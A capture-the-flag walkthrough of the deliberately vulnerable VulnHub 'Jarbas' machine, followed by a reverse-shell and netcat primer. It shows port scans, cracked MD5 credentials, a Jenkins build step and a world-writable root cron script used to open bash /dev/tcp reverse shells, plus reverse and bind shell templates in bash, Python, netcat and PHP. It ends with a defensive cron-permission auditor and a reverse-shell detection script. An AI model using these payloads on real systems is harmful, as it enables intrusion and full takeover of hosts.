# JARBAS
The target VM is available at https://download.vulnhub.com/jarbas/Jarbas.zip. After downloading, unzip it, open it in VMware and keep it on the same network as the Kali machine.

## Information gathering

1. Identify the target's IP address.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sn 192.168.186.0/24
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-03 04:33 EDT
Nmap scan report for 192.168.186.1 (192.168.186.1)
Host is up (0.00047s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.186.2 (192.168.186.2)
Host is up (0.00016s latency).
MAC Address: 00:50:56:EC:88:83 (VMware)
Nmap scan report for 192.168.186.132 (192.168.186.132)
Host is up (0.00021s latency).
MAC Address: 00:0C:29:1C:EF:7E (VMware)
Nmap scan report for 192.168.186.254 (192.168.186.254)
Host is up (0.00012s latency).
MAC Address: 00:50:56:EF:45:80 (VMware)
Nmap scan report for 192.168.186.128 (192.168.186.128)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.94 seconds
```

The target's IP address is 192.168.186.132.

2. Port-scan the target.

> Full TCP scan

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sT --min-rate 10000 -p- 192.168.186.132
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-03 04:35 EDT
Nmap scan report for 192.168.186.132 (192.168.186.132)
Host is up (0.0016s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy
MAC Address: 00:0C:29:1C:EF:7E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.43 seconds
```

> UDP scan

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sU --min-rate 10000 -p- 192.168.186.132
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-03 04:36 EDT
Warning: 192.168.186.132 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.186.132 (192.168.186.132)
Host is up (0.00064s latency).
Not shown: 65456 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
PORT      STATE SERVICE
33848/udp open  unknown
MAC Address: 00:0C:29:1C:EF:7E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 72.93 seconds
```

Open ports: 22, 80, 3306, 8080 (TCP) and 33848 (UDP).

3. Run service/version detection, the default scripts and OS detection against the open ports.

> TCP scan

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sT -sV -sC -O -p22,80,3306,8080 192.168.186.132
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-03 04:38 EDT
Nmap scan report for 192.168.186.132 (192.168.186.132)
Host is up (0.00031s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA)
|   256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA)
|_  256 57:72:08:54:b7:56:ff:c3:e6:16:6f:97:cf:ae:7f:76 (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Jarbas - O Seu Mordomo Virtual!
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
| http-methods: 
|_  Potentially risky methods: TRACE
3306/tcp open  mysql   MariaDB 10.3.23 or earlier (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
MAC Address: 00:0C:29:1C:EF:7E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.93 seconds
```

From this we learn:

- port 22: SSH login;
- port 80: Apache/2.4.6 (CentOS) PHP/5.4.16;
- port 8080: another website, whose robots.txt disallows access.

> UDP scan

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sU -sV -sC -O -p33848 192.168.186.132
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-03 04:39 EDT
Nmap scan report for 192.168.186.132 (192.168.186.132)
Host is up (0.00032s latency).

PORT      STATE SERVICE VERSION
33848/udp open  unknown
| fingerprint-strings: 
|   AFSVersionRequest, Citrix, DNS-SD, DNSStatusRequest, DNSVersionBindReq, Help, Kerberos, NBTStat, NTPRequest, NetMotionMobility, ONCRPC_CALL, RPCCheck, SIPOptions, SNMPv1public, SNMPv3GetRequest, Sqlping, sybaseanywhere, xdmcp: 
|_    <hudson><version>2.113</version><server-id>79704f1ca3914502789b0e0161b7d92c</server-id></hudson>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33848-UDP:V=7.95%I=7%D=10/3%Time=68DF8BC7%P=x86_64-pc-linux-gnu%r(O
SF:NCRPC_CALL,60,"<hudson><version>2\.113</version><server-id>79704f1ca391
SF:4502789b0e0161b7d92c</server-id></hudson>")%r(RPCCheck,60,"<hudson><ver
SF:sion>2\.113</version><server-id>79704f1ca3914502789b0e0161b7d92c</serve
SF:r-id></hudson>")%r(DNSVersionBindReq,60,"<hudson><version>2\.113</versi
SF:on><server-id>79704f1ca3914502789b0e0161b7d92c</server-id></hudson>")%r
SF:(DNSStatusRequest,60,"<hudson><version>2\.113</version><server-id>79704
SF:f1ca3914502789b0e0161b7d92c</server-id></hudson>")%r(NBTStat,60,"<hudso
SF:n><version>2\.113</version><server-id>79704f1ca3914502789b0e0161b7d92c<
SF:/server-id></hudson>")%r(Help,60,"<hudson><version>2\.113</version><ser
SF:ver-id>79704f1ca3914502789b0e0161b7d92c</server-id></hudson>")%r(SIPOpt
SF:ions,60,"<hudson><version>2\.113</version><server-id>79704f1ca391450278
SF:9b0e0161b7d92c</server-id></hudson>")%r(Sqlping,60,"<hudson><version>2\
SF:.113</version><server-id>79704f1ca3914502789b0e0161b7d92c</server-id></
SF:hudson>")%r(NTPRequest,60,"<hudson><version>2\.113</version><server-id>
SF:79704f1ca3914502789b0e0161b7d92c</server-id></hudson>")%r(SNMPv1public,
SF:60,"<hudson><version>2\.113</version><server-id>79704f1ca3914502789b0e0
SF:161b7d92c</server-id></hudson>")%r(SNMPv3GetRequest,60,"<hudson><versio
SF:n>2\.113</version><server-id>79704f1ca3914502789b0e0161b7d92c</server-i
SF:d></hudson>")%r(xdmcp,60,"<hudson><version>2\.113</version><server-id>7
SF:9704f1ca3914502789b0e0161b7d92c</server-id></hudson>")%r(AFSVersionRequ
SF:est,60,"<hudson><version>2\.113</version><server-id>79704f1ca3914502789
SF:b0e0161b7d92c</server-id></hudson>")%r(DNS-SD,60,"<hudson><version>2\.1
SF:13</version><server-id>79704f1ca3914502789b0e0161b7d92c</server-id></hu
SF:dson>")%r(Citrix,60,"<hudson><version>2\.113</version><server-id>79704f
SF:1ca3914502789b0e0161b7d92c</server-id></hudson>")%r(Kerberos,60,"<hudso
SF:n><version>2\.113</version><server-id>79704f1ca3914502789b0e0161b7d92c<
SF:/server-id></hudson>")%r(sybaseanywhere,60,"<hudson><version>2\.113</ve
SF:rsion><server-id>79704f1ca3914502789b0e0161b7d92c</server-id></hudson>"
SF:)%r(NetMotionMobility,60,"<hudson><version>2\.113</version><server-id>7
SF:9704f1ca3914502789b0e0161b7d92c</server-id></hudson>");
MAC Address: 00:0C:29:1C:EF:7E (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.40 seconds
```

The fingerprint response identifies the service as a **Hudson/Jenkins** continuous-integration server:

```bash
<hudson><version>2.113</version><server-id>79704f1ca3914502789b0e0161b7d92c</server-id></hudson>
```

- **Software**: Hudson/Jenkins
- **Version**: 2.113
- **Server ID**: 79704f1ca3914502789b0e0161b7d92c

4. Vulnerability scan.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap --script=vuln -p22,80,3306,8080 192.168.186.132
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-03 04:49 EDT
Nmap scan report for 192.168.186.132 (192.168.186.132)
Host is up (0.00028s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.186.132:80/index_arquivos/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.186.132:80/index_arquivos/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.186.132:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.186.132:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.186.132:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.186.132:80/index_arquivos/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.186.132:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.186.132:80/index_arquivos/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.186.132:80/index_arquivos/?C=M%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.186.132:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.186.132:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.186.132:80/index_arquivos/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.186.132:80/index_arquivos/?C=S%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.186.132:80/index_arquivos/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.186.132:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider
|_    http://192.168.186.132:80/index_arquivos/?C=M%3BO%3DA%27%20OR%20sqlspider
|_http-trace: TRACE is enabled
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.186.132
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.186.132:80/
|     Form id: wmtb
|     Form action: /web/submit
|     
|     Path: http://192.168.186.132:80/
|     Form id: 
|     Form action: /web/20020720170457/http://jarbas.com.br:80/user.php
|     
|     Path: http://192.168.186.132:80/
|     Form id: 
|_    Form action: /web/20020720170457/http://jarbas.com.br:80/busca/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
3306/tcp open  mysql
8080/tcp open  http-proxy
| http-enum: 
|_  /robots.txt: Robots file
MAC Address: 00:0C:29:1C:EF:7E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 39.59 seconds
```

## Port 80

> Directory scan

The wordlist used is SecLists, a collection of security lists maintained by OWASP: https://github.com/danielmiessler/SecLists. After downloading, unzip and rename it: `sudo unzip master.zip -d seclists`

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo gobuster dir -u http://192.168.186.132/ -w /usr/share/wordlists/seclists/SecLists-master/Discovery/Web-Content/raft-large-directories.txt -x php,html
[sudo] password for kali:
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.186.132/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/SecLists-master/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 32808]
/access.html          (Status: 200) [Size: 359]
/index.html           (Status: 200) [Size: 32808]
Progress: 186843 / 186843 (100.00%)
===============================================================
Finished
===============================================================
```

Three `user:hash` pairs are recovered:

```txt
tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98
```

> Which hash type?

```bash
┌──(kali㉿kali)-[~]
└─$ hash-identifier
   [hash-identifier v1.2 banner: By Zion3R, www.Blackploit.com, Root@Blackploit.com]
   --------------------------------------------------
 HASH: 5978a63b4654c73c60fa24f836386d87

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
```

> Cracking the MD5 hashes

https://www.somd5.com/

```bash
tiago:italia99
trindade:marianna
eder:vipsu
```

## Port 8080

Port 8080 presents a login form; the application behind it is Jenkins.

> robots.txt

> Try the recovered accounts; logging in as eder:vipsu succeeds.

Jenkins is an open-source, Java-based continuous-integration tool used to monitor repeated jobs, intended to provide an open, easy-to-use software platform.

> Finding the weak point

1. Click to create a new job.
2. Enter a project name, select the first option (Freestyle project) and click OK.
3. Under Build, a build step that runs a shell command can be added directly.
4. Construct the reverse shell:

```bash
/bin/bash -i >& /dev/tcp/192.168.186.128/4444 0>&1
```

Listen on port 4444 on the Kali machine.

Once the project is saved, click "Build Now".

The reverse shell connects back successfully.

## Privilege escalation via crontab

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.186.128] from (UNKNOWN) [192.168.186.132] 59282
bash: no job control in this shell
bash-4.2$ whoami
whoami
jenkins
bash-4.2$ id
id
uid=997(jenkins) gid=995(jenkins) groups=995(jenkins) context=system_u:system_r:initrc_t:s0
bash-4.2$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System Administrator.
It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

sudo: no tty present and no askpass program specified
bash-4.2$ 
```

Check the scheduled tasks:

```bash
bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
```

`CleaningScript.sh` is executed as root every five minutes. Check whether it is writable:

```bash
bash-4.2$ ls -l /etc/script/CleaningScript.sh
ls -l /etc/script/CleaningScript.sh
-rwxrwxrwx. 1 root root 50 Apr  1  2018 /etc/script/CleaningScript.sh
```

> Construct another reverse shell

```bash
echo "/bin/bash -i >& /dev/tcp/192.168.186.128/6666 0>&1" >> /etc/script/CleaningScript.sh
```

```bash
bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash
rm -rf /var/log/httpd/access_log.txt
/bin/bash -i >& /dev/tcp/192.168.186.128/6666 0>&1
bash-4.2$ 
```

Meanwhile, listen on port 6666 on Kali:

```bash
sudo nc -lnvp 6666
```

> Root obtained

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nc -lnvp 6666
[sudo] password for kali:
listening on [any] 6666 ...
connect to [192.168.186.128] from (UNKNOWN) [192.168.186.132] 44530
bash: no job control in this shell
[root@jarbas ~]# whoami
whoami
root
[root@jarbas ~]# id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023
[root@jarbas ~]# cd /root
cd /root
[root@jarbas ~]# ls
ls
flag.txt
[root@jarbas ~]# cat flag.txt
cat flag.txt
Hey! Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)

Thanks for appreciating this machine.
@tiagotvrs
[root@jarbas ~]# 
```

## Reverse shells

### Overview

A reverse shell is a technique in which **the target host initiates a connection to a port on which the controlling side (attacker or administrator) is already listening** and redirects its command-line streams (stdin, stdout, stderr) over that connection. The controlling side can then send commands to the target and receive the results, giving it remote control.

> Classification

**Forward (bind) shell**: the controlling side connects to a port the target has opened (the target listens in advance); suited to targets that can be reached directly, such as hosts on the public internet.

**Reverse shell**: the target connects out to the controlling side's listening port; suited to targets inside an internal network, behind a firewall that blocks inbound connections, or when the controlling side sits behind NAT and cannot be reached directly.

> Basic flow

1. **Controller listens**: open a network listener on the control server.
2. **Target runs the reverse-shell code**: execute the reverse-shell command on the victim host.
3. **Connection and stream redirection**: the victim host connects to the controller's listening port.
4. **Session interaction**: execute commands over the established connection.

### Implementations

A reverse shell can be built with many languages or system tools; the core is always "establish a network connection + redirect the I/O streams".

> Bash (Linux)

Bash's /dev/tcp pseudo-device (supported on some systems) opens a TCP connection and redirects the streams directly:

```bash
/bin/bash -i >& /dev/tcp/<controller IP>/<controller port> 0>&1
```

Explanation: `bash -i` starts an interactive shell; `>&` redirects stdout and stderr to the network connection opened through /dev/tcp; `0>&1` redirects stdin to stdout, that is, to the same network connection.

> Python (cross-platform; Python must be installed on the target)

```python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("<controller IP>", <controller port>))  # connect to the controller
os.dup2(s.fileno(),0)   # redirect stdin to the socket
os.dup2(s.fileno(),1)   # redirect stdout to the socket
os.dup2(s.fileno(),2)   # redirect stderr to the socket
p=subprocess.call(["/bin/sh","-i"])   # start an interactive shell
```

> Netcat (nc; netcat must be installed on the target)

```bash
nc <controller IP> <controller port> -e /bin/sh   # -e binds the shell to the connection
```

Some netcat builds disable `-e`; a pipe works around that: `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <controller IP> <controller port> >/tmp/f`

> PHP (web servers; triggered through a web script)

```php
<?php
$sock=fsockopen("<controller IP>", <controller port>);  // open the connection
exec("/bin/sh -i <&3 >&3 2>&3");                        // redirect I/O to the socket (file descriptor 3)
?>
```

## netcat

### Overview

Netcat (nc) is a powerful network tool, often called the "Swiss Army knife of networking"; its simple, flexible design and wide applicability make it a staple of network debugging, penetration testing and remote administration. It supports TCP and UDP and can be used for port scanning, connection establishment, data transfer, shell interaction and more, and it is cross-platform (Linux, Windows and macOS builds all exist).

> Definition

Netcat is a command-line network tool whose core function is to establish a TCP or UDP connection between two hosts and carry data over it (text, files, command streams and so on).

Its design philosophy is "simple but general": a minimal interface that allows the most flexible network interaction. It can be used on its own or combined with other tools (bash, python) to build more complex functionality.

> Features

**Protocol support**: TCP by default; `-u` selects UDP.
**Bidirectional communication**: once connected, data flows both ways (read from standard input, written to standard output).
**Stateless design**: it does not parse application-layer protocols (HTTP, FTP); it only moves raw data, which makes it extremely flexible.
**Cross-platform**: ports exist for the major operating systems (GNU Netcat, OpenBSD Netcat, ncat and other variants).

> Command format

```bash
nc [options] [target IP] [target port]
```

> Most common options

| Option | Purpose |
| ---- | ------------------------------------------------------------ |
| -l | Listen mode (wait passively for a connection); used with -p to set the port. |
| -p | Local port (for listening or connecting). |
| -v | Verbose output, useful for debugging (connection success/failure messages). |
| -vv | Even more verbose (debug level), showing low-level detail such as the TCP handshake. |
| -n | Skip DNS resolution (use IP addresses directly, faster connection). |
| -u | Use UDP (the default is TCP). |
| -e | Bind a program to the connection (e.g. -e /bin/sh binds a shell to the connection; extremely risky). |
| -w | Timeout in seconds, limiting how long a connect or listen waits. |
| -z | Scan mode (only check whether ports are open, send no data). |

### Core functions

> Port scanning (check whether target ports are open)

With -z (scan mode) and -v (verbose) you can quickly check the state of a host's ports (TCP by default; -u scans UDP).

```bash
nc -zv 192.168.1.100 80-85
```

> Establishing a TCP/UDP connection (simple chat / data transfer)

Host A (listen):

```bash
nc -lvp 8888   # -l listen, -v verbose, -p port 8888
```

Host B (connect):

```bash
nc -nv 192.168.1.101 8888   # -n no DNS lookup, -v verbose
```

Once connected, text typed on either side is sent to the other in real time; Ctrl+C closes the connection.

> File transfer (quick transfer with no dependencies)

When the target has no scp, ftp or similar tools, Netcat can transfer files through redirection (the port must be reachable).

Host B (receiver, listens first):

```bash
nc -lvp 8888 > test.txt   # write received data to test.txt
```

Host A (sender, connects and sends):

```bash
nc -nv 192.168.1.102 8888 < test.txt   # read test.txt and send it
```

When the transfer finishes, press Ctrl+C on both sides. Archives, binaries and other files can be sent the same way.

> Forward (bind) shell

The target listens on a port with a shell bound to it; the controller connects to that port to obtain the shell.

Target (Linux):

```bash
nc -lvp 8888 -e /bin/sh   # listen on 8888 and bind /bin/sh to the connection
```

Controller:

```bash
nc -nv <target IP> 8888   # connect to the target port and get the shell
```

After connecting, commands typed on the controller run on the target and the results are returned.

> Reverse shell

The target connects to the controller's listening port and hands over a shell (for targets inside an internal network or behind a firewall that blocks inbound connections).

Controller (listens first):

```bash
nc -lvp 8888   # listen on 8888 and wait for the connection
```

Target (Linux):

```bash
nc -nv <controller IP> 8888 -e /bin/sh   # connect out and send the shell
```

Once the connection is established, the controller can operate the target remotely.

> Port forwarding (traffic relay)

Netcat can forward traffic arriving on a local port to a given port on another host, a simple form of "port mapping".

**Scenario**: forward local port 8080 to 10.0.0.1:80 (connecting to local 8080 is then equivalent to connecting to 10.0.0.1:80).

```bash
nc -lvp 8080 -c 'nc 10.0.0.1 80'   # -c runs a command; traffic is relayed to 10.0.0.1:80
```

> As a minimal web server

Combined with echo and a pipe, Netcat can act as a web server that returns fixed content (for testing only).

**Example**: listen on port 80 and answer every visitor with "Hello Netcat":

```bash
while true; do echo -e "HTTP/1.1 200 OK\n\nHello Netcat" | nc -lvp 80; done
```

Note: `while true` re-listens after each connection closes; `echo -e` builds the HTTP response header.
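A defender's check for the cron weakness used in the privilege-escalation section (a root cron job running a world-writable script), as an added Python example that is not part of the original write-up; the crontab text, script names and the temporary files it creates are constructed for the demonstration.

```python
"""Audit an /etc/crontab-style file for jobs that run, as root, a program that
unprivileged users can modify (on Jarbas, /etc/script/CleaningScript.sh was
mode 0777 and ran every five minutes). Added example, not from the write-up;
the crontab text and the temporary scripts below are constructed."""
import os
import re
import stat
import tempfile

CRONTAB_TEXT = """SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
# constructed job lines; the two script paths are filled in by demo()
*/5 * * * * root {writable} >/dev/null 2>&1
0 3 * * * root {safe}
@daily backup /usr/local/bin/backup.sh
"""

def parse_system_crontab(text):
    """Yield (user, command) per job; '@daily'-style lines have 1 schedule field, others 5."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue                              # blank, comment or VAR=value
        n = 1 if line.startswith("@") else 5
        parts = line.split(None, n + 1)           # schedule..., user, command
        if len(parts) >= n + 2:
            yield parts[n], parts[n + 1]

def writable_by_others(path):
    """True if the group or world write bit is set on an existing path."""
    return os.path.exists(path) and bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit(text):
    """Return [(program, reason)] for root jobs whose program or its directory is writable."""
    findings = []
    for user, command in parse_system_crontab(text):
        program = command.split()[0]
        if user != "root" or not program.startswith("/"):
            continue                              # only absolute paths run by root
        reasons = []
        if writable_by_others(program):
            reasons.append("script is group/world-writable")
        if writable_by_others(os.path.dirname(program)):
            reasons.append("parent directory is group/world-writable")
        if reasons:
            findings.append((program, "; ".join(reasons)))
    return findings

def demo():
    """Create a 0777 script (as on Jarbas) and a 0755 one, then audit them."""
    d = tempfile.mkdtemp()
    os.chmod(d, 0o755)                            # mkdtemp creates 0700
    writable, safe = os.path.join(d, "CleaningScript.sh"), os.path.join(d, "rotate.sh")
    for path, mode in ((writable, 0o777), (safe, 0o755)):
        with open(path, "w") as f:
            f.write("#!/bin/bash\n")
        os.chmod(path, mode)
    return audit(CRONTAB_TEXT.format(writable=writable, safe=safe))

if __name__ == "__main__":
    for program, reason in demo():
        print(f"{program}: {reason}")
```

The same `audit()` can be pointed at a real `/etc/crontab` or the files under `/etc/cron.d`; on Jarbas it would have reported `/etc/script/CleaningScript.sh` as group/world-writable.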
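Detection logic for the reverse and bind shell variants listed in the reverse-shell and netcat sections, as an added example that is not from the original page; it runs signature patterns over constructed process command lines, and the 10.0.0.5 address is a placeholder.

```python
"""Flag process command lines that match the reverse/bind shell patterns
described above (bash /dev/tcp, nc -e, the mkfifo|nc pipe, Python dup2,
PHP fsockopen). Added detection example, not part of the original page;
the command lines and the 10.0.0.5 address are constructed samples."""
import re

# (rule name, regex). Meant to run over auditd/EDR execve command lines: loose
# enough to catch bash vs /bin/bash or nc vs ncat, strict enough to skip the
# benign nc uses shown on the page (port check, file transfer).
RULES = [
    ("bash-dev-tcp", re.compile(r"/dev/(tcp|udp)/\S+/\d+")),
    ("nc-exec", re.compile(r"\b(nc|ncat|netcat)\b.*\s-[a-zA-Z]*[ec]\s")),
    ("mkfifo-nc", re.compile(r"mkfifo\b.*\|\s*(nc|ncat|netcat)\b")),
    ("python-dup2-shell", re.compile(r"socket\.socket.*dup2.*(/bin/(ba)?sh|pty\.spawn)")),
    ("php-fsockopen-shell", re.compile(r"fsockopen\(.*(exec|proc_open|popen)\(")),
]

# Constructed samples: the variants from the page plus benign nc usage and noise.
SAMPLE_CMDLINES = [
    "/bin/bash -i >& /dev/tcp/10.0.0.5/4444 0>&1",
    "nc -zv 192.168.1.100 80-85",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.5 4444 >/tmp/f",
    "nc -lvp 8888 > test.txt",
    "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));"
    "os.dup2(s.fileno(),0);subprocess.call([\"/bin/sh\",\"-i\"])'",
    "nc -lvp 8888 -e /bin/sh",
    "php -r '$sock=fsockopen(\"10.0.0.5\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "ls -la /var/log",
]

def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(cmdlines):
    """Return [(cmdline, [rule names])] for the lines that matched at least one rule."""
    return [(line, classify(line)) for line in cmdlines if classify(line)]

if __name__ == "__main__":
    for line, names in scan(SAMPLE_CMDLINES):
        print(f"{', '.join(names):22} {line}")
```

The `nc-exec` rule also fires on the page's port-forwarding form (`nc -lvp 8080 -c '...'`), since that too hands a program to the connection; tune the rule list to what is legitimate on your hosts.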
毛林
October 3, 2025, 18:29